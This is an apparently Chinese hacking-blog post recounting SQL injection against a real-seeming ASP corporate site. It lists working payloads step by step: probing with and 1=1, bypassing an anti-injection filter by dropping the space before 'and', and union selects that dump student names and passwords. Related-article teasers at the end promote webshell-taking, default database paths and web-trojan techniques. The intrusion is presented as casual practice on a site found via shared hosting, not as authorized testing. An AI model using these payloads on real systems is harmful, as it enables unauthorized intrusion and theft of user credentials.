记一次绕过垃圾防注入系统过程

hacker5年前黑客文章756

今天无聊在帮一个站做渗透测试的时候,旁注找到一个asp企业站,asp好站拿点嘛,所以还是非常开心的,其中一个asp站,有这样的链接:

http://www.xxx.cn/news_list.asp?news_id=1165

目测一般都有漏洞,加个单引号看看,啪地弹出一个框,尿都吓出来了

20121130123849523

现在好多的ASP网站由于都存在注入等问题,于是都装备了这种先进的注入系统,所以你一般看到有反注入系统的站后面都是存在注入漏洞的,能bypass反注入就搞定了,不过一般这些反注入系统都很垃圾,很多没有过滤cookie注入,或者随便改下注入语句就能绕过了,下面的烂大街语句肯定都被拦截了。

http://www.xxx.cn/news_list.asp?news_id=1165 and 1=1

http://www.xxx.cn/news_list.asp?news_id=1165 and 1=2

http://www.xxx.com /news_list.asp?news_id=1165 and 666=666

让我感到震撼的是,居然order by 没有拦截,完全是一个没有节操的防注入系统啊,用order by确定了字段数是9,过滤了and,采用编码绕过也没有成功,试了几次,我发现它过滤的特征是”空格+and“,那么我们索性不要空格了,直接这样写:

http://www.xxx.cn/news_list.asp?news_id=1165and 1=1

http://www.xxx.cn/news_list.asp?news_id=1165and 1=2

嘿嘿嘿, *** 了吧,成功绕过了,网上说的绕过技巧很多,可是好像没有提过这种 *** ,虽然绕过了可惜猜不出管理员表,只猜出了用户表,union一下,还是可以查出来的。

http://www.xxx.cn/news_list.asp?news_id=1165and 1=2 union select 1,2,3,4,5,6,7,8,9 from student

http://www.xxx.cn/news_list.asp?news_id=1165and 1=2 union select 1,2,student_name,4,5,6,student_password,8,9 from student

20121212004985435

2012121201289091 (1)

对它的库也没兴趣,纯属练手而已,完。

标签: 黑客技术

相关文章

什么是免疫程序调试?免疫系统疾病CANVASpentes

什么是免疫程序调试?免疫系统疾病CANVASpentes

immunity debugger 翻译中文也可了解为“免疫力程序调试”;   什么是免疫程序调试? 免疫系统疾病CANVAS pentesting专用工具能够用于检测你的系统软件真的是多...

最全面的各大建站数据库及默认密码(渗透必备)

/data/dvbbs7.mdb 动网论坛数据库 /databackup/dvbbs7.mdb 动网论坛数据库 /bbs/databackup/dvbbs7.mdb 动网论坛数据库...

镜像劫持、网马详细介绍

镜像劫持、网马详细介绍

今日,有一位网民问了我一个难题,他自己早已拥有网址了,如今他想制成“镜像劫持”这类网址,要是开启它,电脑上就会有将会感柒木马程序。   木马病毒是必须开启才有实际效果的,开启标准:要不蒙骗...

ECshop商城系统后台拿webshell方法

ECshop商城系统后台拿webshell方法

之前,网上爆出了ecshop最新的0day .论坛里也有人直接给出了EXP 相信好多基友都拿了不少的站吧. 这几天正好有个朋友要我帮忙拿一个站 看了一下,ecshop的  直接...

w3af是不是适用全部电脑操作系统?

w3af是不是适用全部电脑操作系统?

什么叫w3af? w3af是搜索和开发设计Web程序运行系统漏洞最时兴,灵便和强劲的专用工具之一。它非常容易应用,它出示了数十种开发设计和网页页面评定软件的作用。别人则将其称之为以互联网为管理中心的...

详解ASP PHP脚本渗透入侵过程

简单判定有无漏洞: 粗略型:’ 1. 数字型: and 1=1 and 1=2 2.字符型: ‘ and ’1′=’1 ‘ and ’1′=’2 3.搜索型:...